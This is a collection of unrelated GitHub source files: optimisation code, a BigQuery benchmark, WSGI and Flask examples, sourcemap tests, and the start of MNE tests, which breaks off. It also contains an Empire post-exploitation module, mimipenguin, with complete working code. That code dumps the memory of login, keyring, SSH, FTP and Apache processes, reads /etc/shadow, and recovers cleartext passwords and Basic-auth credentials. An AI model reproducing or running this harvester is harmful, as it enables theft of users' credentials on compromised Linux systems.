+----------------+---------------------------+----------------------------+
| Parameter | Default | Details |
+================+===========================+============================+
| ``lambda_`` | ``floor(4 + 3 * log(N))`` | Number of children to |
| | | produce at each generation,|
| | | ``N`` is the individual's |
| | | size. |
+----------------+---------------------------+----------------------------+
| ``mu`` | ``floor(lambda_ / 2)`` | The number of parents to |
| | | keep from the |
| | | lambda children. |
+----------------+---------------------------+----------------------------+
| ``weights`` | ``"superlinear"`` | Decrease speed, can be |
| | | ``"superlinear"``, |
| | | ``"linear"`` or |
| | | ``"equal"``. |
+----------------+---------------------------+----------------------------+
| ``cs`` | ``(mueff + 2) / | Cumulation constant for |
| | (N + mueff + 3)`` | step-size. |
+----------------+---------------------------+----------------------------+
| ``damps`` | ``1 + 2 * max(0, sqrt(( | Damping for step-size. |
| | mueff - 1) / (N + 1)) - 1)| |
| | + cs`` | |
+----------------+---------------------------+----------------------------+
| ``ccum`` | ``4 / (N + 4)`` | Cumulation constant for |
| | | covariance matrix. |
+----------------+---------------------------+----------------------------+
| ``ccov1`` | ``2 / ((N + 1.3)^2 + | Learning rate for rank-one |
| | mueff)`` | update. |
+----------------+---------------------------+----------------------------+
| ``ccovmu`` | ``2 * (mueff - 2 + 1 / | Learning rate for rank-mu |
| | mueff) / ((N + 2)^2 + | update. |
| | mueff)`` | |
+----------------+---------------------------+----------------------------+
"""
def __init__(self, population, sigma, params={}):
# Create a centroid individual
self.centroid = copy.deepcopy(population[0])
# Clear its content
self.centroid[:] = self.centroid[0:0]
# The centroid is used in new individual creation
self.centroid.extend(numpy.mean(population, 0))
self.dim = len(self.centroid)
self.sigma = sigma
self.pc = numpy.zeros(self.dim)
self.ps = numpy.zeros(self.dim)
self.chiN = math.sqrt(self.dim) * (1 - 1. / (4. * self.dim) + \
1. / (21. * self.dim**2))
self.B = numpy.identity(self.dim)
self.C = numpy.identity(self.dim)
self.diagD = numpy.ones(self.dim)
self.BD = self.B * self.diagD
self.lambda_ = params.get("lambda_", int(4 + 3 * math.log(self.dim)))
self.update_count = 0
self.params = params
self.computeParams(self.params)
def generate(self):
"""Generate lambda offsprings from the current strategy using the
centroid individual as parent.
"""
arz = numpy.random.randn(self.lambda_, self.dim)
offsprings = list()
empty_ind = copy.deepcopy(self.centroid) # Create an individual
del empty_ind[:] # faster to copy
for i in xrange(self.lambda_):
ind = copy.deepcopy(empty_ind)
ind.extend(self.centroid + self.sigma * numpy.dot(self.BD, arz[i]))
offsprings.append(ind)
return offsprings
def update(self, population):
"""Update the current covariance matrix strategy.
"""
sorted_pop = sorted(population, key=lambda ind: ind.fitness,
reverse=True)
old_centroid = numpy.array(self.centroid)
centroid = numpy.dot(self.weights, sorted_pop[0:self.mu])
del self.centroid[:] # Clear the centroid individual
self.centroid.extend(centroid)
c_diff = centroid - old_centroid
# Cumulation : update evolution path
self.ps = (1 - self.cs) * self.ps \
+ math.sqrt(self.cs * (2 - self.cs) * self.mueff) / self.sigma \
* numpy.dot(self.B, (1. / self.diagD) \
* numpy.dot(self.B.T, c_diff))
hsig = numpy.linalg.norm(self.ps) \
/ math.sqrt(1 - (1 - self.cs)**(2 * self.update_count)) \
/ self.chiN < 1.4 + 2 / (self.dim + 1)
self.update_count += 1
self.pc = (1 - self.cc) * self.pc \
+ hsig * (math.sqrt(self.cc * (2 - self.cc) * self.mueff) / \
self.sigma) * c_diff
# Update covariance matrix
artmp = sorted_pop[0:self.mu] - old_centroid
self.C = (1 - self.ccov1 - self.ccovmu + (1 - hsig) \
* self.ccov1 * self.cc * (2 - self.cc)) * self.C \
+ numpy.outer(self.ccov1 * self.pc, self.pc) \
+ self.ccovmu \
* numpy.dot(artmp.T , (self.weights * artmp.T).T) \
/ self.sigma**2
self.sigma *= numpy.exp((numpy.linalg.norm(self.ps) / self.chiN - 1.) \
* self.cs / self.damps)
self.diagD, self.B = numpy.linalg.eigh(self.C)
indx = numpy.argsort(self.diagD)
self.diagD = self.diagD[indx]
self.diagD **= 0.5
self.B = self.B[:,indx]
self.BD = self.B * self.diagD
def computeParams(self, params):
"""Those parameters depends on lambda and need to computed again if it
changes during evolution.
"""
self.mu = params.get("mu", self.lambda_ / 2)
rweights = params.get("weights", "superlinear")
if rweights == "superlinear":
self.weights = math.log(self.mu + 0.5) - \
numpy.log(numpy.arange(1, self.mu + 1))
elif rweights == "linear":
self.weights = self.mu + 0.5 - numpy.arange(1, self.mu + 1)
elif rweights == "equal":
self.weights = numpy.ones(self.mu)
else:
pass # Print some warning ?
self.weights /= sum(self.weights)
self.mueff = 1. / sum(self.weights**2)
self.cc = params.get("ccum", 4. / (self.dim + 4.))
self.cs = params.get("cs", (self.mueff + 2.) /
(self.dim + self.mueff + 3.))
self.ccov1 = params.get("ccov1", 2. / ((self.dim + 1.3)**2 + \
self.mueff))
self.ccovmu = params.get("ccovmu", 2. * (self.mueff - 2. + \
1. / self.mueff) / \
((self.dim + 2.)**2 + self.mueff))
self.ccovmu = min(1 - self.ccov1, self.ccovmu)
self.damps = 1. + 2. * max(0, math.sqrt((self.mueff - 1.) / \
(self.dim + 1.)) - 1.) + self.cs
self.damps = params.get("damps", self.damps)
def rand(individual):
"""Random test objective function."""
return numpy.random.random()
def plane(individual):
"""Plane test objective function."""
return individual[0]
def rastrigin(individual):
"""Rastrigin test objective function. Consider using ``lambda_ = 20 * N``
for this test function.
"""
return 10 * len(individual) + sum(gene * gene - 10 * \
math.cos(2 * math.pi * gene) for gene in individual)
def sphere(individual):
"""Sphere test objective function."""
return sum(gene * gene for gene in individual)
def cigar(individual):
"""Cigar test objective function."""
return individual[0]**2 + 1e6 * sum(gene * gene for gene in individual)
def rosenbrock(individual):
"""Rosenbrock test objective function."""
return sum(100 * (x * x - y)**2 + (1. - x)**2 \
for x, y in zip(individual[:-1], individual[1:]))
| {
"content_hash": "6bd56da840762f6471f67e867deec9b7",
"timestamp": "",
"source": "github",
"line_count": 251,
"max_line_length": 80,
"avg_line_length": 43.63745019920319,
"alnum_prop": 0.44499223956906786,
"repo_name": "rainest/dance-partner-matching",
"id": "0729f45645c6e48d1e2c06f7e4a2f6693ab3a40b",
"size": "11858",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "eap/cma.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1745363"
},
{
"name": "Shell",
"bytes": "348"
}
],
"symlink_target": ""
} |
"""Runs a BigQuery TensorFlow connector benchmark."""
import time
from absl import app
from absl import flags
from google.cloud import bigquery
import tensorflow as tf
from tensorflow.python.framework import dtypes
from tensorflow_io.bigquery import BigQueryClient
FLAGS = flags.FLAGS
flags.DEFINE_string("project_id", None,
"GCP project id benchmark is run under.")
flags.mark_flag_as_required("project_id")
flags.DEFINE_string("dataset_project_id", "bigquery-public-data",
"GCP project where dataset is located.")
flags.DEFINE_string("dataset_id", "baseball", "Dataset id.")
flags.DEFINE_string("table_id", "games_wide", "Table id.")
flags.DEFINE_integer("num_iterations", 1000, "Number of batches to load.")
flags.DEFINE_integer("num_warmup_iterations", 10,
"Number of warmup batches to load that doesn't count "
"towards benchmark results.")
flags.DEFINE_integer("requested_streams", 1, "Number of streams.")
flags.DEFINE_integer("batch_size", 2048, "Batch size.")
flags.DEFINE_integer("prefetch_size", None, "Prefetch size.")
flags.DEFINE_integer(
"mini_batch_size", 100, "Mini batch size - to divide num_iterations."
)
flags.DEFINE_integer("num_columns", 120, "Number of columns to read.")
flags.DEFINE_bool(
"sloppy",
False,
"If True the implementation is allowed, for the sake of expediency, "
"to produce elements in a non-deterministic order",
)
flags.DEFINE_enum("format", "AVRO", ["AVRO", "ARROW"],
"Serialization format - AVRO or ARROW")
def convert_field_type(field_type):
if field_type == "STRING":
return dtypes.string
if field_type == "INTEGER":
return dtypes.int64
if field_type == "TIMESTAMP":
return dtypes.int64
raise ValueError(f"unsupported field_type:{field_type}")
def get_dataset_schema(dataset_project_id, dataset_id, table_id):
client = bigquery.Client(project=FLAGS.project_id)
dataset_ref = client.dataset(dataset_id, project=dataset_project_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
column_names = [field.name for field in table.schema]
output_types = [convert_field_type(field.field_type)
for field in table.schema]
return (column_names, output_types)
def get_dataset_from_bigquery(dataset_project_id, dataset_id, table_id):
"""Reads data from BigQuery and returns it as a TensorFlow dataset."""
(selected_fields, output_types) = get_dataset_schema(
dataset_project_id,
dataset_id,
table_id)
client = BigQueryClient()
read_session = client.read_session(
"projects/" + FLAGS.project_id,
dataset_project_id,
table_id,
dataset_id,
selected_fields=selected_fields,
output_types=output_types,
requested_streams=FLAGS.requested_streams,
data_format=BigQueryClient.DataFormat[FLAGS.format])
streams = read_session.get_streams()
print(
"Requested %d streams, BigQuery returned %d streams"
% (FLAGS.requested_streams, len(streams))
)
def read_rows(stream):
dataset = read_session.read_rows(stream)
if FLAGS.batch_size != 1:
dataset = dataset.batch(FLAGS.batch_size)
return dataset
streams_count = tf.size(streams)
streams_count64 = tf.cast(streams_count, dtype=tf.int64)
streams_ds = tf.data.Dataset.from_tensor_slices(streams)
dataset = streams_ds.interleave(
read_rows,
cycle_length=streams_count64,
num_parallel_calls=streams_count64,
deterministic=not FLAGS.sloppy)
if FLAGS.prefetch_size is not None:
dataset = dataset.prefetch(FLAGS.prefetch_size)
return dataset.repeat()
def run_benchmark(_):
"""Runs a BigQuery TensorFlow Connector benchmark."""
dataset = get_dataset_from_bigquery(FLAGS.dataset_project_id,
FLAGS.dataset_id,
FLAGS.table_id)
num_iterations = FLAGS.num_iterations
batch_size = FLAGS.batch_size
itr = tf.compat.v1.data.make_one_shot_iterator(dataset)
mini_batch = FLAGS.mini_batch_size
print("Started benchmark warmup")
for _ in range(FLAGS.num_warmup_iterations):
_ = itr.get_next()
print("Started benchmark")
n = 0
start = time.time()
for _ in range(num_iterations // mini_batch):
local_start = time.time()
start_n = n
for _ in range(mini_batch):
n += batch_size
_ = itr.get_next()
local_end = time.time()
print(
"Processed %d entries in %f seconds. [%f] rows/s"
% (
n - start_n,
local_end - local_start,
(mini_batch * batch_size) / (local_end - local_start),
)
)
end = time.time()
print("Processed %d entries in %f seconds. [%f] rows/s" %
(n, end - start, n / (end - start)))
print("Benchmark result: [%f] rows/s" % (n / (end - start)))
# Run as:
# pylint: disable=line-too-long
# python3 test_runner.py --project_id=<your project id> --batch_size=2048 --num_iterations=100 --mini_batch_size=10 --num_columns=120 --requested_streams=20
if __name__ == "__main__":
app.run(run_benchmark)
| {
"content_hash": "c67eb716b0ef40777f6f597a32f45672",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 156,
"avg_line_length": 32.955128205128204,
"alnum_prop": 0.663100564092589,
"repo_name": "GoogleCloudPlatform/PerfKitBenchmarker",
"id": "dec08933a8176a24cb18b971f7c680b185bcf616",
"size": "5141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "perfkitbenchmarker/scripts/bigquery_tensorflow_connector_test_scripts/test_runner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3420"
},
{
"name": "HTML",
"bytes": "113073"
},
{
"name": "Jinja",
"bytes": "62005"
},
{
"name": "Lua",
"bytes": "1547"
},
{
"name": "Python",
"bytes": "6076512"
},
{
"name": "R",
"bytes": "1017"
},
{
"name": "Shell",
"bytes": "76164"
},
{
"name": "Tcl",
"bytes": "14601"
}
],
"symlink_target": ""
} |
import os
import webob.dec
import webob.exc
from webob import Request
from webob import Response
from paste.deploy import loadapp
from wsgiref.simple_server import make_server
"""
A filter class factory shall be defined such that:
0. The factory method shall return the filter class itself. By design, the
filter does not know the next app, cannot and does not initialize the class
by itself. The framework performs that. One way to pass instance-specific
variables to define the filter class internal (see LogFilterV2).
A filter class (returned by the factory) shall be defined such that:
1. The __init__() accepts a single argument app, which is the next app
(callable class) in the pipeline.
2. The __call__() shall update the arguments environ and start_response, call
the next app with exactly these same two arguments. To simplify that, use
@webob.dec.wsgify() instead.
A terminal/app class factory shall be defined such that:
0. The factory method shall initialize and return an instance of the app
class. The framework does not perform or care about the initialization.
Thus there is technical no requirement on the __init__() function. This
also means that we could pass instance variable to the class directly,
without relying on the internal class hacking.
A terminal/app class shall be defined such that:
0. The __init__() has no requirement, as said above. We are free to pass in
instance-specific variables we like.
1. The __call__() shall call start_response to set HTTP headers, return the
final result.
The decorator @webob.dec.wsgify() can help simplify the __call__().
Originally, we would have to write:
def __call__(self, environ, start_response):
req = Request(environ)
res = Response()
...
return res(environ, start_response)
Now we could write instead:
@webob.dec.wsgify()
def __call__(self, req): # request-taking and response-returning
res = Response()
...
return res # for terminal/app class
req.get_response(self.app) # for filter class
"""
class LogFilter(object):
def __init__(self, app):
self.app = app
pass
def __call__(self, environ, start_response):
print "filter:LogFilter is called."
return self.app(environ, start_response)
@classmethod
def factory(cls, global_conf, **kwargs):
print "in LogFilter.factory", global_conf, kwargs
return LogFilter
class LogFilterV2(object):
@classmethod
def factory(cls, global_conf, **kwargs):
print "in LogFilter.factory", global_conf, kwargs
username = kwargs['username']
password = kwargs['password']
class Filter(object):
def __init__(self, app):
self.app = app
# pass in arguments in the config file
self.username = username
self.password = password
@webob.dec.wsgify()
def __call__(self, req):
print "filter:LogFilterV2 called (username=%s, password=%s)" % (
self.username, self.password)
return req.get_response(self.app)
return Filter
class ShowVersion(object):
def __init__(self, version):
self.version = version
pass
def __call__(self, environ, start_response):
start_response("200 OK", [("Content-type", "text/plain")])
return "Paste Deploy LAB: Version = %s" % self.version
@classmethod
def factory(cls, global_conf, **kwargs):
print "in ShowVersion.factory", global_conf, kwargs
# create app class instance with arguments from config file
return ShowVersion(kwargs['version'])
class Calculator(object):
def __init__(self):
pass
@webob.dec.wsgify()
def __call__(self, req):
res = Response()
res.status = "200 OK"
res.content_type = "text/plain"
# get operands
operator = req.GET.get("operator", None)
operand1 = req.GET.get("operand1", None)
operand2 = req.GET.get("operand2", None)
print req.GET
opnd1 = int(operand1)
opnd2 = int(operand2)
if operator == u'plus':
result = opnd1 + opnd2
elif operator == u'minus':
result = opnd1 - opnd2
elif operator == u'star':
result = opnd1 * opnd2
elif operator == u'slash':
result = opnd1 / opnd2
else:
raise webob.exc.HTTPBadRequest(
"the operator %s unknown" % operator)
res.body = "%s /nRESULT= %d" % (str(req.GET), result)
return res
@classmethod
def factory(cls, global_conf, **kwargs):
print "in Calculator.factory", global_conf, kwargs
return Calculator()
if __name__ == '__main__':
configfile = "pastedeploylab.ini"
appname = "pdl"
wsgi_app = loadapp("config:%s" % os.path.abspath(configfile), appname)
server = make_server('localhost', 8080, wsgi_app)
usages = """
Usages: access these URLs using curl or httpie:
http://127.0.0.1:8080/
http://127.0.0.1:8080/calc?operator=plus&operand1=12&operand2=23
http://127.0.0.1:8080/admin/users/
http://127.0.0.1:8080/admin/users/1
Note: our URL routing/mapping here is naive, if /admin (no terminal '/')
is requested, the server will throw exception
'RoutesException: URL or environ must be provided'.
"""
print(usages)
server.serve_forever()
| {
"content_hash": "f5826ea5de7bc7f4240c5fc4249e093e",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 80,
"avg_line_length": 33.920245398773005,
"alnum_prop": 0.6332067281606077,
"repo_name": "sunrenjie/3rd-deadly-technotes",
"id": "6ceaf0675a349bfb7efdb8a7530cd04b0fba0da3",
"size": "5529",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "technologies/python/pastedeploylab/pastedeploylab.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "21404"
},
{
"name": "HTML",
"bytes": "733684"
},
{
"name": "Python",
"bytes": "30119"
},
{
"name": "RenderScript",
"bytes": "3279"
},
{
"name": "Roff",
"bytes": "11998"
},
{
"name": "Shell",
"bytes": "63797"
},
{
"name": "Vim script",
"bytes": "223"
},
{
"name": "Visual Basic",
"bytes": "1106"
}
],
"symlink_target": ""
} |
from flask import Flask
from flask.ext.locale import Locale, translate
app = Flask(__name__)
# app.config['DEFAULT_LOCALE'] = 'zh_CN'
locale = Locale(app)
@app.route('/')
def hello():
return translate('Hello')
@locale.localeselector
def loader():
return 'en_US'
if __name__ == "__main__":
app.run(debug=True)
| {
"content_hash": "fe19bde1a6c12fbf36705aa700410f11",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 46,
"avg_line_length": 16.4,
"alnum_prop": 0.6463414634146342,
"repo_name": "scardine/flask-locale",
"id": "c0a55149377a0b4e16541c9aee549439f7cbfebe",
"size": "328",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21774"
}
],
"symlink_target": ""
} |
from builtins import object
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Linux MimiPenguin',
# list of one or more authors for the module
'Author': ['@rvrsh3ll'],
'Software': 'S0179',
'Techniques': ['T1003'],
# more verbose multi-line description of the module
'Description': ("Port of huntergregal mimipenguin. Harvest's current user's cleartext credentials."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
from __future__ import print_function
import os
import platform
import re
import base64
import binascii
import crypt
import string
def running_as_root():
return os.geteuid() == 0
def get_linux_distribution():
try:
return platform.dist()[0].lower()
except IndexError:
return str()
def compute_hash(ctype, salt, password):
return crypt.crypt(password, '{}{}'.format(ctype, salt))
def strings(s, min_length=4):
strings_result = list()
result = str()
for c in s:
try:
c = chr(c)
except TypeError:
# In Python 2, c is already a chr
pass
if c in string.printable:
result += c
else:
if len(result) >= min_length:
strings_result.append(result)
result = str()
return strings_result
def dump_process(pid):
dump_result = bytes()
with open('/proc/{}/maps'.format(pid), 'r') as maps_file:
for l in maps_file.readlines():
memrange, attributes = l.split(' ')[:2]
if attributes.startswith('r'):
memrange_start, memrange_stop = [
int(x, 16) for x in memrange.split('-')]
memrange_size = memrange_stop - memrange_start
with open('/proc/{}/mem'.format(pid), 'rb') as mem_file:
try:
mem_file.seek(memrange_start)
dump_result += mem_file.read(memrange_size)
except (OSError, ValueError, IOError, OverflowError):
pass
return dump_result
def find_pid(process_name):
pids = list()
for pid in os.listdir('/proc'):
try:
with open('/proc/{}/cmdline'.format(pid), 'rb') as cmdline_file:
if process_name in cmdline_file.read().decode():
pids.append(pid)
except IOError:
continue
return pids
class PasswordFinder:
_hash_re = r'^\$.\$.+$'
def __init__(self):
self._potential_passwords = list()
self._strings_dump = list()
self._found_hashes = list()
def _dump_target_processes(self):
target_pids = list()
for target_process in self._target_processes:
target_pids += find_pid(target_process)
for target_pid in target_pids:
self._strings_dump += strings(dump_process(target_pid))
def _find_hash(self):
for s in self._strings_dump:
if re.match(PasswordFinder._hash_re, s):
self._found_hashes.append(s)
def _find_potential_passwords(self):
for needle in self._needles:
needle_indexes = [i for i, s in enumerate(self._strings_dump)
if re.search(needle, s)]
for needle_index in needle_indexes:
self._potential_passwords += self._strings_dump[
needle_index - 10:needle_index + 10]
self._potential_passwords = list(set(self._potential_passwords))
def _try_potential_passwords(self):
valid_passwords = list()
found_hashes = list()
pw_hash_to_user = dict()
if self._found_hashes:
found_hashes = self._found_hashes
with open('/etc/shadow', 'r') as f:
for l in f.readlines():
user, pw_hash = l.split(':')[:2]
if not re.match(PasswordFinder._hash_re, pw_hash):
continue
found_hashes.append(pw_hash)
pw_hash_to_user[pw_hash] = user
found_hashes = list(set(found_hashes))
for found_hash in found_hashes:
ctype = found_hash[:3]
salt = found_hash.split('$')[2]
for potential_password in self._potential_passwords:
potential_hash = compute_hash(ctype, salt, potential_password)
if potential_hash == found_hash:
try:
valid_passwords.append(
(pw_hash_to_user[found_hash], potential_password))
except KeyError:
valid_passwords.append(
('<unknown user>', potential_password))
return valid_passwords
def dump_passwords(self):
self._dump_target_processes()
self._find_hash()
self._find_potential_passwords()
return self._try_potential_passwords()
class GdmPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - GNOME]'
self._target_processes = ['gdm-password']
self._needles = ['^_pammodutil_getpwnam_root_1$',
'^gkr_system_authtok$']
class GnomeKeyringPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - GNOME]'
self._target_processes = ['gnome-keyring-daemon']
self._needles = [r'^.+libgck\-1\.so\.0$', r'libgcrypt\.so\..+$']
class VsftpdPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - VSFTPD]'
self._target_processes = ['vsftpd']
self._needles = [
r'^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$']
class SshdPasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[SYSTEM - SSH]'
self._target_processes = ['sshd:']
self._needles = [r'^sudo.+']
class ApachePasswordFinder(PasswordFinder):
def __init__(self):
PasswordFinder.__init__(self)
self._source_name = '[HTTP BASIC - APACHE2]'
self._target_processes = ['apache2']
self._needles = [r'^Authorization: Basic.+']
def _try_potential_passwords(self):
valid_passwords = list()
for potential_password in self._potential_passwords:
try:
potential_password = base64.b64decode(potential_password)
except binascii.Error:
continue
else:
try:
user, password = potential_password.split(':', maxsplit=1)
valid_passwords.append((user, password))
except IndexError:
continue
return valid_passwords
def dump_passwords(self):
self._dump_target_processes()
self._find_potential_passwords()
return self._try_potential_passwords()
def main():
if not running_as_root():
raise RuntimeError('mimipenguin should be ran as root')
password_finders = list()
if find_pid('gdm-password'):
password_finders.append(GdmPasswordFinder())
if find_pid('gnome-keyring-daemon'):
password_finders.append(GnomeKeyringPasswordFinder())
if os.path.isfile('/etc/vsftpd.conf'):
password_finders.append(VsftpdPasswordFinder())
if os.path.isfile('/etc/ssh/sshd_config'):
password_finders.append(SshdPasswordFinder())
if os.path.isfile('/etc/apache2/apache2.conf'):
password_finders.append(ApachePasswordFinder())
for password_finder in password_finders:
for valid_passwords in password_finder.dump_passwords():
print('{}\t{}:{}'.format(password_finder._source_name,
valid_passwords[0], valid_passwords[1]))
if __name__ == '__main__':
main()
"""
return script
| {
"content_hash": "65e8df738a0d5a7b55a4bf3947805da5",
"timestamp": "",
"source": "github",
"line_count": 318,
"max_line_length": 113,
"avg_line_length": 31.5188679245283,
"alnum_prop": 0.5548239050184576,
"repo_name": "byt3bl33d3r/Empire",
"id": "4dd8ee6e50c189aaf284ea9c281718c16b342a79",
"size": "10023",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/modules/python/collection/linux/mimipenguin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "16998705"
},
{
"name": "Python",
"bytes": "2789955"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
import os
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.md')) as f:
README = f.read()
# FIXME: Also requires PyQt and SIP for the GUI, not available via pip
requires = [
'pycoin == 0.51',
'bunch',
'python-jsonrpc == 0.7.3',
#'python-bitcoinaddress = 0.2.2',
'python-bitcoinlib == 0.1.1',
'apigen == 0.1.6',
'web.py',
]
dependency_links = [
"https://github.com/petertodd/python-bitcoinlib/archive/v0.1.1.zip" +
"#egg=python-bitcoinlib",
]
setup(
name='ngcccbase',
version='0.0.10',
description='A flexible and modular base for colored coin software.',
long_description=README,
classifiers=[
"Programming Language :: Python",
],
url='https://github.com/bitcoinx/ngcccbase',
keywords='bitcoinx bitcoin coloredcoins',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
dependency_links=dependency_links,
test_suite="ngcccbase.tests",
)
| {
"content_hash": "88cded49341f95d45682f10f41d4a199",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 73,
"avg_line_length": 26.75,
"alnum_prop": 0.6532710280373831,
"repo_name": "chromaway/ngcccbase",
"id": "3c6c895d9fe944f850aaf3001e94d5e3bbc42fda",
"size": "1168",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "606"
},
{
"name": "Python",
"bytes": "465138"
},
{
"name": "Shell",
"bytes": "1753"
}
],
"symlink_target": ""
} |
import click
class LogLevel(object):
ERROR = 'ER'
WARN = 'WN'
OK = 'OK'
class Logger(object):
LEVEL_COLORS = {
LogLevel.ERROR: 'red',
LogLevel.WARN: 'yellow',
LogLevel.OK: 'green',
}
def __init__(self, module_name):
self._module_name = module_name
def log(self, level, message=''):
click.secho(self._format_message(level, message))
def warn(self, message):
self.log(LogLevel.WARN, message)
def error(self, message):
self.log(LogLevel.ERROR, message)
def prompt(self, message):
while True:
response = input(
self._format_message(LogLevel.WARN, message + ' [Y/N] ')
)
if response in {'Y', 'y'}:
return True
if response in {'N', 'n'}:
return False
def _format_message(self, level, message):
level_color = self.LEVEL_COLORS[level]
return '{} {} {}'.format(
click.style('[{}]'.format(level), fg=level_color),
click.style(self._module_name, fg='blue'),
click.style(message, fg=level_color)
)
| {
"content_hash": "911d24b43aa58c071588ab32630d8ed6",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 72,
"avg_line_length": 25.77777777777778,
"alnum_prop": 0.5301724137931034,
"repo_name": "gregflynn/dotsanity",
"id": "ae7daf29863b3cf5632793af98e91acb10ca9072",
"size": "1160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sanity/logger.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Lua",
"bytes": "67603"
},
{
"name": "Python",
"bytes": "98571"
},
{
"name": "Shell",
"bytes": "20993"
},
{
"name": "Vim Script",
"bytes": "8073"
}
],
"symlink_target": ""
} |
try:
import unittest2 as unittest
except ImportError:
import unittest
import sourcemap
import json
class IntegrationTestCase(unittest.TestCase):
def get_fixtures(self, base):
source = open('tests/fixtures/%s.js' % base).read()
minified = open('tests/fixtures/%s.min.js' % base).read()
min_map = open('tests/fixtures/%s.min.map' % base).read()
return source, minified, min_map
def test_jquery(self):
source, minified, min_map = self.get_fixtures('jquery')
source_lines = source.splitlines()
assert sourcemap.discover(minified) == 'jquery.min.map'
index = sourcemap.loads(min_map)
assert index.raw == json.loads(min_map)
for token in index:
# Ignore tokens that are None.
# There's no simple way to verify they're correct
if token.name is None:
continue
source_line = source_lines[token.src_line]
start = token.src_col
end = start + len(token.name)
substring = source_line[start:end]
# jQuery's sourcemap has a few tokens that are identified
# incorrectly.
# For example, they have a token for 'embed', and
# it maps to '"embe', which is wrong. This only happened
# for a few strings, so we ignore
if substring[0] == '"':
continue
assert token.name == substring
def test_coolstuff(self):
source, minified, min_map = self.get_fixtures('coolstuff')
source_lines = source.splitlines()
assert sourcemap.discover(minified) == 'tests/fixtures/coolstuff.min.map'
index = sourcemap.loads(min_map)
assert index.raw == json.loads(min_map)
for token in index:
if token.name is None:
continue
source_line = source_lines[token.src_line]
start = token.src_col
end = start + len(token.name)
substring = source_line[start:end]
assert token.name == substring
def test_unicode_names(self):
_, _, min_map = self.get_fixtures('unicode')
# This shouldn't blow up
sourcemap.loads(min_map)
| {
"content_hash": "211192db562139719999f83aac9349c1",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 81,
"avg_line_length": 33.47761194029851,
"alnum_prop": 0.5862683905483728,
"repo_name": "mattrobenolt/python-sourcemap",
"id": "87550764e4fdbe406aea5beb453b2a8a99fda953",
"size": "2243",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_integration.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Makefile",
"bytes": "154"
},
{
"name": "Python",
"bytes": "219037"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from itertools import product
import os
import os.path as op
import warnings
from nose.tools import assert_raises, assert_true
import numpy as np
from numpy.testing import (assert_equal, assert_allclose)
from mne.datasets import testing
from mne.io import read_raw_fif, read_raw_kit, read_raw_bti, read_info
from mne.io.constants import FIFF
from mne import (read_forward_solution, make_forward_solution,
convert_forward_solution, setup_volume_source_space,
read_source_spaces, make_sphere_model,
pick_types_forward, pick_info, pick_types, Transform,
read_evokeds, read_cov, read_dipole)
from mne.utils import (requires_mne, requires_nibabel, _TempDir,
run_tests_if_main, slow_test, run_subprocess)
from mne.forward._make_forward import _create_meg_coils, make_forward_dipole
from mne.forward._compute_forward import _magnetic_dipole_field_vec
from mne.forward import Forward, _do_forward_solution
from mne.dipole import Dipole, fit_dipole
from mne.simulation import simulate_evoked
from mne.source_estimate import VolSourceEstimate
from mne.source_space import (get_volume_labels_from_aseg,
